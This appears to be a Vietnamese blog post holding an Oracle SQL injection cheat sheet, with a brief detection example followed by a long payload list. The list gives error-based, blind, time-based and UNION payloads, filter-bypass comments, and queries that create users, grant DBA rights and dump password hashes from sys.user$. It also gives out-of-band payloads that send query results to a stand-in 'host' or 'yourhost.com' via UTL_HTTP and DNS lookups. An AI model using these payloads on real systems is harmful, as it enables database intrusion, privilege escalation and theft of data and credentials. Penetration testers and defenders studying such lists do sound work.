Với mỗi tham số đầu vào cần được kiểm tra SQL Injection,ví dụ một ứng dụng web cho phép người dùng tìm kiếm sách theo tên tác giả:
http://www.example.com/pls/bookstore/books.search?author=DICKENSTruy vấn trên trả về kết quả danh sách các quyển sách của tác giả Charles Dickens
http://www.example.com/pls/bookstore/books.search?author=DICK'ENSTruy vấn trên trả về 404 Not Found hoặc lỗi khác. Có thể kiểm tra khẳng định lỗi Oracle SQL Injection bằng cách sử dụng toán tử nối chuỗi:
http://www.example.com/pls/bookstore/books.search?author=DICK'||'ENS
Nếu truy vấn trên trả về kết quả danh sách các quyển sách của tác giả Charles Dickens, ta có thể khẳng định ứng dụng bị lỗi SQL injection
Danh sách Payload
Version SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT version FROM v$instance;
Current User SELECT user FROM dual
Current Database SELECT instance_name FROM v$instance;
Quick Detection
Error Based SQLi For integer inputs : (utl_inaddr.get_host_address((select user from DUAL)))
For string inputs : ' + (utl_inaddr.get_host_address((select user from DUAL))) + '
The attacks above should throw conversion errors.
Clear SQLi Tests These tests are simply good for boolean sql injection and silent attacks.
product.asp?id=4
product.asp?id=5-1
product.asp?id=4 OR 1=1
Blind SQL Injection
) AND 1=0 AND (1=1
) AND 1=1 AND (1=1
AND 1=0
AND 1=1
') AND 1=0 AND ('a'='a
') AND 1=1 AND ('a'='a
' AND 1=0 AND 'a'='a
' AND 1=1 AND 'a'='a
%' AND 1=0 AND '%'='
%' AND 1=1 AND '%'='
AND 1=0-- JBrD
AND 1=1-- EcCC
Blind SQL Injection (Time Based)
select+dbms_pipe.receive_message((chr(95)||chr(96)||chr(97))+from+dual)
Line Comments
Username: admin'--
SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'
DROP/*comment*/sampletable
DR/**/OP/*bypass blacklisting*/sampletable
If Statements
BEGIN
IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END;
String without Quotes
SELECT CHR(75)||CHR(76)||CHR(77)
This will return ‘KLM’.
UNION query
SELECT header, txt FROM news UNION ALL SELECT name, pass FROM membersCommand Execution
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
Creating JAVA library
DBMS_SCHEDULER
EXTPROC
PL/SQL native make utility (9i only)
Create Users
CREATE USER user IDENTIFIED by pass;
Drop Users
DROP USER user
Make User DBA
GRANT DBA to USER
List Users
SELECT name FROM sys.user$ where type#=1
SELECT * FROM all_users
List Passwords
SELECT name, password FROM sys.user$ where type#=1
List Databases
SELECT DISTINCT owner FROM all_tables
Privileges
SELECT * FROM session_privs
SELECT * FROM dba_role_privs
SELECT * FROM dba_sys_privs
SELECT * FROM user_tab_privs
Other Components
SELECT * FROM dba_registry
Getting user defined tables
SELECT * FROM all_tables where OWNER=’DATABASE_NAME'
Getting Column Names
SELECT * FROM all_col_comments WHERE TABLE_NAME='TABLE'
Default Databases
SYSTEM
SYSAUX
Path of DB files
SELECT name FROM V$DATAFILE
SELECT * FROM dba_directories
Time Based SQLi Exploitation
?vulnerableParam=(SELECT CASE WHEN (NVL(ASCII(SUBSTR(({INJECTION}),1,1)),0) = 100) THEN dbms_pipe.receive_message(('xyz'),14) ELSE dbms_pipe.receive_message(('xyz'),1) END FROM dual)
{INJECTION} = You want to run the query.
If the condition is true, will response after 14 seconds. If is false, will be delayed for one second.
Out of Band Channel
?vulnerableParam=(SELECT UTL_HTTP.REQUEST('http://host/ sniff.php?sniff='||({INJECTION})||'') FROM DUAL)
Sniffer application will save results
?vulnerableParam=(SELECT UTL_HTTP.REQUEST('http://host/ '||({INJECTION})||'.html') FROM DUAL)
Results will be saved in HTTP access logs
?vulnerableParam=(SELECT UTL_INADDR.get_host_addr(({INJECTION})||'.yourhost.com') FROM DUAL)
You need to sniff dns resolution requests to yourhost.com
?vulnerableParam=(SELECT SYS.DBMS_LDAP.INIT(({INJECTION})||’.yourhost.com’,80) FROM DUAL)
You need to sniff dns resolution requests to yourhost.com
{INJECTION} = You want to run the query.
Error-based XMLType
select XMLType((select substr(version,1,1) from v$instance)) from users;
Error-based UTL_INADDR.GET_HOST_ADDRESS
) AND 1=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(120)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(120)||CHR(113))-- pRUk
Error-based CTXSYS.DRITHSX.SN
) AND 5883=CTXSYS.DRITHSX.SN(5883,(CHR(113)||CHR(120)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (5883=5883) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(120)||CHR(113)))-- YEEf
Error-based DBMS_UTILITY.SQLID_TO_SQLHASH
) AND 7516=DBMS_UTILITY.SQLID_TO_SQLHASH((CHR(113)||CHR(120)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (7516=7516) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(120)||CHR(113)))-- ulPq
Error-based - Parameter replace
(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (6501=6501) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL)Oracle inline queries
(SELECT CHR(113)||CHR(120)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (6556=6556) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(120)||CHR(113) FROM DUAL)Oracle stacked queries heavy query
);SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5--Oracle stacked queries DBMS_LOCK.SLEEP
);BEGIN DBMS_LOCK.SLEEP(10); END--Oracle stacked queries USER_LOCK.SLEEP
);BEGIN USER_LOCK.SLEEP(10); END--
Không có nhận xét nào:
Đăng nhận xét